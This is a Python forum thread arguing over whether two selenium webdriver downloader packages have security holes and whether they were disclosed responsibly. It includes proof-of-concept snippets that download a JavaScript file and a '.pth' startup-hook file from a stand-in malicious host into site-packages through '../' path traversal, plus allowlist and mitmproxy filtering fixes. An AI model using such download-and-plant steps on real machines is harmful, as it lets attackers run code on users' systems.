selenium webdriver or cover for arbitrary GET requests

9d 17h ago by programming.dev/u/logging_strict in python@programming.dev from github.com

Not all coders are created equal. But there should be a line where we collectively just say, "Please stop".

I would like to say I found two critical issues in two Python packages, but they are obvious to a six-year-old. Not sure I can claim credit for such in-your-face obvious issues.

And since it's so obvious, responsible disclosure kinda got kicked to the curb.

These libraries pin the required dependencies and test only one Python interpreter, so let's just say I had lowered expectations going in.

get-gecko-driver and get-chrome-driver look like they are unneeded since both selenium and webdriver-manager can download selenium webdrivers. In the latter two packages, web browser support is sparse; there is room for more flexibility. For example, support for waterfox, librewolf, and mullvad-browser.

Issues summary:

1. The downloader module can send a GET request to any URL. There is no URL whitelist. These packages can be used as cover when making arbitrary GET requests.
2. The downloader can save anywhere on the file system, so it can be used for purposes other than downloading a selenium webdriver.
3. There are no permission checks before saving/writing the file.
4. get_gecko_driver.downloader and get_chrome_driver.downloader are the exact same module.

I lack confidence the author will respond, and will be very pleasantly surprised if the author fixes these issues in a timely manner. Nor am I confident he'd do a good job. But at least these issues are disclosed and the ball is in his court.

For your entertainment:

All these coding errors are unforgivable and obvious to even a novice coder, a layman, or a random drunk. It takes talent not to see it. If the author had bothered to do unit testing, it would have been impossible not to see it.

These issues are both CRITICAL SECURITY issues.

Obvious is obvious. Don't kill the messenger; instead let's just fix this issue. The correct action is to quickly fix it and then just agree never to mention it again and pray there is no Darwin award for coders.

You decided not to responsibly disclose a security vulnerability that you assessed to be critical, because you thought it was obvious?

Also way to go not taking the side of:

an active member of this community
someone understanding and in a position to increase browser support for selenium webdrivers
a coder who'd care and doesn't suck at coding

So what do you get for the Captain Obvious comment besides being right? A clock is right twice a day. But no dopamine hit from a clock.

A better strategy would be to ask how to go about increasing selenium webdriver browser support and whether a more flexible package is in the works. Not to defend a hopeless package in dire need of a rewrite. Or to provide the info I asked for about how to go about responsibly disclosing security issues.

Understand your heart is in the right place. Hope you can understand that alone isn't the only consideration or way to look at this. You can press the issue and still come away with nothing.

Rinse, wash, repeat, and still the reflex reaction will remain the same. I'm suggesting trying something else.

Okay I think it's worth responding to these point by point:

Also way to go not taking the side of an active member of this community

I'm not taking sides. Being an active member of a community doesn't absolve you or anyone else of behaving irresponsibly.

[Also way to go not taking the side of] someone understanding and in a position to increase browser support for selenium webdrivers

I don't doubt your intention to increase browser support for selenium webdrivers. However I don't agree with your decision to disclose what you deem a critical security bug without any indication that you attempted to disclose the issue to the project maintainer before advertising the issue here.

[Also way to go not taking the side of] a coder who'd care and doesn't suck at coding

Your coding ability in this situation is not in question or an issue.

So what do you get for the Captain Obvious comment besides being right? A clock is right twice a day. But no dopamine hit from a clock.

What I got were clarifications to questions I had after reading your original post. I wanted to make sure that I hadn't made any quick assumptions before I concluded whether or not I thought you had behaved ethically.

A better strategy would be to ask how to go about increasing selenium webdriver browser support and whether a more flexible package is in the works. Not to defend a hopeless package in dire need of a rewrite. Or to provide the info I asked for about how to go about responsibly disclosing security issues.

Your original post didn't ask how to responsibly disclose a security issue. And you posted this, by your own admission, without responsibly disclosing.

For future reference, here is how you responsibly disclose critical security issues to a project: you find contact information for a maintainer or, if available, the project's security team. You send them a message confidentially (email, private message, issue tracker post stating you have found a critical issue you wish to disclose securely). You wait for them to get back to you. If they do, you coordinate a fix, and then you wait for the fix to be released and communicated before releasing details of the issue.

If the maintainer doesn't get back to you, try another maintainer. If they don't get back to you, then you've done all you can and you can release information on the issue.

Let me ask you: what was your intention behind your original post? You haven't provided a fix here, or a PR, and as far as I can see you haven't forked the project with a fix. So I don't understand how doing this makes the situation any better. If anything, it's placed the users of this project at a higher risk.

These packages are selenium webdriver flavored curl.

Did not set out to be a security researcher chasing bug bounties. Was not looking to discover exploits. It just happened. Read enough packages and eventually by random chance it's bound to happen.

After submitting an issue (admittedly in the open), I have not submitted a PR to fix the attack packages. Even if I wanted to, PRs happen AFTER an issue is approved by the author/maintainer.

Have posted 4 issues without any response. The 5th magically disappeared. There have been no comments from the author.

Appealing to the author might not be the correct tactic. Just wondering if these are the sort of packages pypi.org takes down.

intention behind your original post? You haven’t provided a fix here, or a PR, as far as I can see you haven’t forked the project with a fix

Working on a bigger project which is on my local machine. Got to the point where I wanted to maximize the browsers supported by selenium webdrivers. Currently writing the selenium webdriver related unit tests. Have no issue with branching off the parts dealing with selenium webdrivers and publishing that. It's just not at that stage. And I will probably refactor it again to conform to webdriver-manager standards.

While doing the testing, and while fixing the geckodriver chained downloader, I went thru multiple stages of denial until I realized these packages' main focus is the downloader, and installing selenium webdrivers is merely window dressing.

The fixes are trivial:

allowed (base) URLs whitelist
limit allowed destination folders
providing destination folder is not optional
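
A rough sketch of what those three fixes could look like, in case it helps the discussion. Everything here is an assumption for illustration: check_url, check_destination, and ALLOWED_BASE_URLS are hypothetical names, not part of get-gecko-driver or get-chrome-driver, and the allowlisted base URL is only an example of a release host that would need to be confirmed.

```python
from pathlib import Path
from urllib.parse import urlsplit

# Hypothetical allowlist of base URLs (illustrative, not taken from the packages).
ALLOWED_BASE_URLS = (
    "https://github.com/mozilla/geckodriver/releases/download/",
)


def check_url(url: str) -> str:
    """Return url unchanged if it starts with an allowed base, else raise."""
    parts = urlsplit(url)
    # Reject ".." path segments so a prefix match cannot be walked back out of.
    if ".." in parts.path.split("/"):
        raise ValueError(f"URL contains a parent-directory segment: {url}")
    if not any(url.startswith(base) for base in ALLOWED_BASE_URLS):
        raise ValueError(f"URL is not on the allowlist: {url}")
    return url


def check_destination(dest_dir: str, allowed_root: str) -> Path:
    """Return the resolved destination if it stays inside allowed_root.

    Both arguments are required, so the caller must choose a folder explicitly.
    """
    root = Path(allowed_root).resolve()
    dest = Path(dest_dir).resolve()
    # After resolving, "../.." tricks either land inside root or they do not.
    if dest != root and root not in dest.parents:
        raise ValueError(f"{dest} is outside the allowed folder {root}")
    return dest
```

A downloader would call both checks before opening any connection or file. As later replies point out, in-process checks like these deter accidents and casual misuse; they do not stop someone who can patch the module.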

Yes. That would be a fair assessment. Don't disagree with you.

Do you think I made the wrong ethical call? My position is the author isn't a serious person who'll:

respond
know how to deal with a PR
care

So it's better to inform anyone happening upon get-gecko-driver and get-chrome-driver and do it ASAP. Which I did.

If you made no attempt to disclose this to the author before posting here, then I disagree with your judgement on this.

I made an issue; it magically disappeared. An attempt did occur, admittedly in the open.

Would like to point to issue #5 as evidence, but it was unexpectedly removed.

Can you clarify what the problem is?

1 and 2 are not issues by themselves, cURL can do that.

3 is maybe a problem, but surely it doesn't bypass the filesystem permissions, right? If it does, sure, that's a problem. If not, that's just curl.

These packages aren't intended to be curl and they shouldn't be capable of being curl. So it's unexpected behavior from these packages. The worst that can happen is use in ddos attacks or sabotaging a user's files by overwriting them.

The package doesn't alter fs permissions, but it can write anywhere the running user has permission to write.
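
On the overwrite concern specifically, here is a minimal sketch of one way a downloader could refuse to replace an existing file, using Python's exclusive-create mode. save_new_file is a hypothetical helper, not something either package provides.

```python
from pathlib import Path


def save_new_file(dest: Path, data: bytes) -> None:
    """Write data to dest, refusing to replace a file that already exists."""
    # Mode "xb" creates the file exclusively and raises FileExistsError
    # if the path is already taken, so nothing is silently overwritten.
    with open(dest, "xb") as fh:
        fh.write(data)
```

A caller that really does want to replace an old driver would have to delete it first, which makes the overwrite an explicit decision.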

Is this not enough?

Okay, so it can do arbitrary downloads. That's unideal, but in its normal operation it downloads a full web browser that can do arbitrary downloads. And it's a thin wrapper around requests, which can do arbitrary downloads. Not sure that's really a high severity issue imho.

Recently in this community an article was posted about an exploit that uses the .pth startup hook, which leads to a blog post.

This requires two files: _index.js and [something]-setup.pth.

Can download these using either get-gecko-driver or get-chrome-driver.

>>> from get_gecko_driver import downloader
>>> url_0 = "https://malicioussite.com/_index.js"
>>> url_1 = "https://malicioussite.com/important-setup.pth"
>>> output_path = "../../.venv/lib/python3.11/site-packages/oftenusedpackage"
>>> downloader.download(url_0, output_path=output_path, file_name=None)
>>> downloader.download(url_1, output_path=output_path, file_name=None)

... the machine is part of a botnet

Installing malware is unexpected behavior from a selenium webdriver downloader. Although it's a thin wrapper around requests, it still has to be used responsibly.

You can do exactly that with curl, requests, telnet, netcat or even plain bash. Doesn't make it high severity.

The code you provided is actually behaving exactly as expected. You called the internal download function and it did it.

If you have a way to get it to download arbitrary files from its intended API, that would be much more serious, but that's not what you're showing.

from get_gecko_driver import GetGeckoDriver

# Install the driver:
# Downloads the latest GeckoDriver version
# Adds the downloaded GeckoDriver to path
get_driver = GetGeckoDriver()
get_driver.install()

Do you have a technique to make the above code download an arbitrary URL to an arbitrary file location?

To get the same effect from GetGeckoDriver().install()

from unittest.mock import patch

from get_gecko_driver.get_driver import GetGeckoDriver

target_package_path = "../../../.venv/lib/python3.11/site-packages"
# e.g. 'geckodriver/linux64/0.36.0'
remove_subfolders = "../../.."
output_path = f"{target_package_path}/somepackage/{remove_subfolders}"
url_arbitrary = "https://maliciousurl.com/_index.js"

# Create the instance whose install() call is redirected by the patch
get_driver = GetGeckoDriver()
with patch(
    "get_gecko_driver.get_driver.GetGeckoDriver.version_url",
    return_value=url_arbitrary,
):
    get_driver.install(output_path=output_path)

The URL and destination-folder limits aren't hardcoded within get_gecko_driver.downloader.download (a module-level function), which would have made them harder to patch around. As it stands, GetGeckoDriver is patch friendly.

This assumes all Python coders have experience writing unittest or pytest tests, so usage of unittest.mock.patch is common knowledge and second nature, and no one would struggle to write the above code.

To protect against patching, the base URL cannot live in get_gecko_driver.constants and then be imported by another module. Although not DRY, the base URL must be hardcoded minimally within get_gecko_driver.downloader.download (in the whitelist) and optionally also within get_gecko_driver.get_driver.GetGeckoDriver.install (to raise an exception with a meaningful and actionable message).

Anything you do to fix this "issue" can also be defeated by mock.patch.

You could just mock.patch the entire download function to do anything at all.
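
To illustrate that point, a small self-contained sketch. All names here are hypothetical stand-ins (downloader is a fake namespace, not the real get_gecko_driver.downloader): even when the allowlist is hardcoded inside the download function, replacing the whole function removes the check.

```python
import types
from unittest.mock import patch


def _checked_download(url: str) -> str:
    # The allowlist is hardcoded inside the function body (hypothetical prefix).
    if not url.startswith("https://example.com/releases/"):
        raise ValueError(f"URL not allowed: {url}")
    return f"fetched {url}"


# Stand-in for a third-party module that exposes download().
downloader = types.SimpleNamespace(download=_checked_download)


def install(url: str) -> str:
    """Public entry point that delegates to the module-level download()."""
    return downloader.download(url)


def unchecked_download(url: str) -> str:
    """Replacement without any allowlist."""
    return f"fetched {url} without checks"


def demo() -> str:
    # Swap out the entire function for the duration of the with-block.
    with patch.object(downloader, "download", unchecked_download):
        return install("https://malicious.example/_index.js")
```

Outside the with-block the original function is restored, so install() rejects the same URL again. Anyone who can run code in the same process can do this, which is why the check has to live outside the process to mean anything against a determined adversary.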

Had to research how to go about running untrusted code safely.

In-process there are actions that can be taken to deter mock.patch, but they wouldn't defeat a determined adversary. A subprocess isn't a sufficient security layer, although it would prevent mock.patch from patching a module.

To deter a determined adversary, I recommend using Docker or Firecracker MicroVMs.

So glad we are having this conversation. Instead of jumping in with a fix that is not actually effective.

Within a docker container, mitmproxy can sit filtering network traffic by URL, rather than by IP and port. Ignore that in this example only one URL is allowed.

In pyproject.toml,

[project.scripts]
webdriver_urls_filter = "mypackage.somefolder.mitmproxy_runner:main"

In mypackage.somefolder.mitmproxy_filters,

import re
from typing import TYPE_CHECKING

from mitmproxy import ctx

if TYPE_CHECKING:
    from mitmproxy import http


def request(flow: "http.HTTPFlow") -> None:
    """Run this proxy.

    :type flow: mitmproxy.http.HTTPFlow
    """
    url = flow.request.pretty_url

    # Rather than exact, interested in limiting the base URL.
    # Literal dots are escaped so they match only "." characters.
    ALLOWED_PATTERN = re.compile(r"^https://github\.com/myorg/myrepo/releases/download/v1\.2\.3/.*$")

    # Check if URL matches the allowed release pattern

    try:
        if ALLOWED_PATTERN.match(url):
            ctx.log.info(f"Download allowed: {url}")
        else:
            ctx.log.error(f"Download blocked: {url}")
            flow.kill()
    except Exception as e:
        # FAIL SECURE: If inspection fails, kill the connection to prevent bypass
        ctx.log.error(f"Script error, blocking flow: {e}")
        flow.kill()
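
The allow pattern can be checked on its own, without running mitmproxy. This sketch assumes the intent is a pattern with backslash-escaped dots; is_allowed is a hypothetical helper and the myorg/myrepo URL is the same placeholder used above.

```python
import re

# Escaped dots match only a literal ".", so "githubXcom" is rejected.
ALLOWED_PATTERN = re.compile(
    r"^https://github\.com/myorg/myrepo/releases/download/v1\.2\.3/.*$"
)


def is_allowed(url: str) -> bool:
    """Return True when url falls under the allowed release base URL."""
    return ALLOWED_PATTERN.match(url) is not None
```

Note that the trailing `.*` also accepts paths containing `../`, so a stricter filter might want to reject those segments before matching.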

In mypackage.somefolder.mitmproxy_runner,

import asyncio

from mitmproxy import options
from mitmproxy.tools.dump import DumpMaster

from . import mitmproxy_filters  # addon module


async def _run() -> None:
    """Create and run the proxy inside a running event loop."""
    opts = options.Options(listen_port=8080)
    master = DumpMaster(opts)

    if hasattr(mitmproxy_filters, 'addons'):
        # explicit format which defines a class then appends an instance to
        # :code:`addons = []`
        master.addons.add(*mitmproxy_filters.addons)
    else:
        # Module itself acts as addon
        master.addons.add(mitmproxy_filters)

    # Assumes a recent mitmproxy release, where Master.run() is a coroutine
    await master.run()


def main() -> None:
    """Rather than calling `mitmdump -s myscript.py`."""
    asyncio.run(_run())

The docker container has one network proxy which has web access. Everything else has no web access; instead its traffic is directed thru the proxy. The proxy runs webdriver_urls_filter.

Somehow, not by me, the disclosure was deleted. The issues raised have not been addressed. Way to handle it, ignore it. LOL!

So the head-in-sand approach it is. Or fck off, it's as-is (aka MIT licensed). Either GitHub or the author pulled a MSFT. Unfortunately I cannot tell who deleted it.

I feel vindicated. Didn't get the impression this author can be collaborated with.

Let's say I wanted to responsibly disclose, for a change, these security issues. For future reference, is there a step-by-step guide for Python on how to do that?

Checked, no code of conduct. Good, I'm in the clear.

And get-gecko-driver has 8 stars. Tried to see who starred it. Very kind people who unfortunately are anonymous. While trying to see who starred it, accidentally starred it. Luckily can unstar it, avoiding eternal shame.